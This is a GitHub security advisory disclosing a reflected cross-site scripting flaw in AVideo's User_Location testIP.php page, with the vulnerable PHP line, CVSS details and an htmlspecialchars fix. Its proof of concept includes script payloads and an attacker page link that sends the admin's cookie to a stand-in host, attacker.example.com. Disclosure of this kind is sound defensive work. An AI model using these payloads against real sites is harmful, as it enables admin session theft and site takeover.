Skip to content

AVideo: Reflected XSS via Unescaped ip Parameter in User_Location testIP.php

Moderate severity GitHub Reviewed Published Mar 30, 2026 in WWBN/AVideo • Updated Apr 2, 2026

Package

composer wwbn/avideo (Composer)

Affected versions

<= 26.0

Patched versions

None

Description

Summary

The User_Location plugin's testIP.php page reflects the ip request parameter directly into an HTML input element without applying htmlspecialchars() or any other output encoding. This allows an attacker to inject arbitrary HTML and JavaScript via a crafted URL. Although the page is restricted to admin users, AVideo's SameSite=None cookie configuration allows cross-origin exploitation, meaning an attacker can lure an admin to a malicious link that executes JavaScript in their authenticated session.

Details

At plugin/User_Location/testIP.php:16, the ip parameter is read from the request without sanitization:

$ip = $_REQUEST['ip'];

At line 34, the value is echoed directly into an HTML input element's value attribute:

<input type="text" name="ip" id="ip" class="form-control" value="<?php echo $ip; ?>">

No htmlspecialchars() is applied, allowing an attacker to break out of the value attribute and inject arbitrary HTML/JavaScript.

While the page requires admin authentication to access, AVideo sets session cookies with SameSite=None. When an admin clicks a link from an external site (email, chat, another website), their session cookie is sent with the request, and the XSS payload executes in the context of their authenticated admin session.

Proof of Concept

  1. Craft a URL with a payload that breaks out of the input value attribute:
https://your-avideo-instance.com/plugin/User_Location/testIP.php?ip="><script>alert(document.cookie)</script>
  1. URL-encoded version for embedding in links:
https://your-avideo-instance.com/plugin/User_Location/testIP.php?ip=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
  1. The resulting HTML rendered in the browser:
<input type="text" name="ip" id="ip" class="form-control" value=""><script>alert(document.cookie)</script>">
  1. To exploit via cross-origin link (leveraging SameSite=None), host the following on an attacker-controlled page:
<!-- attacker-page.html -->
<html>
<body>
<p>Click here to check your IP geolocation:</p>
<a href="https://your-avideo-instance.com/plugin/User_Location/testIP.php?ip=%22%3E%3Cscript%3Edocument.location=%27https://attacker.example.com/steal?c=%27%2Bdocument.cookie%3C/script%3E">
  Check IP Location
</a>
</body>
</html>
  1. When an admin clicks the link, their session cookie is sent (due to SameSite=None), and the JavaScript executes in their authenticated session.

Impact

An attacker can execute arbitrary JavaScript in the context of an admin user's session by sending them a crafted link. Because AVideo uses SameSite=None for session cookies, the attack works from any external website. Successful exploitation allows the attacker to steal the admin session cookie, create new admin accounts, modify site configuration, upload malicious plugins, or perform any other admin action.

  • CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)
  • Severity: Medium

Recommended Fix

Apply htmlspecialchars() when outputting the $ip variable at plugin/User_Location/testIP.php:34:

// plugin/User_Location/testIP.php:34
<input type="text" name="ip" id="ip" class="form-control" value="<?php echo htmlspecialchars($ip, ENT_QUOTES, 'UTF-8'); ?>">

Found by aisafe.io

References

@DanielnetoDotCom DanielnetoDotCom published to WWBN/AVideo Mar 30, 2026
Published by the National Vulnerability Database Mar 31, 2026
Published to the GitHub Advisory Database Apr 1, 2026
Reviewed Apr 1, 2026
Last updated Apr 2, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(8th percentile)

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

CVE ID

CVE-2026-34739

GHSA ID

GHSA-jqrj-chh6-8h78

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.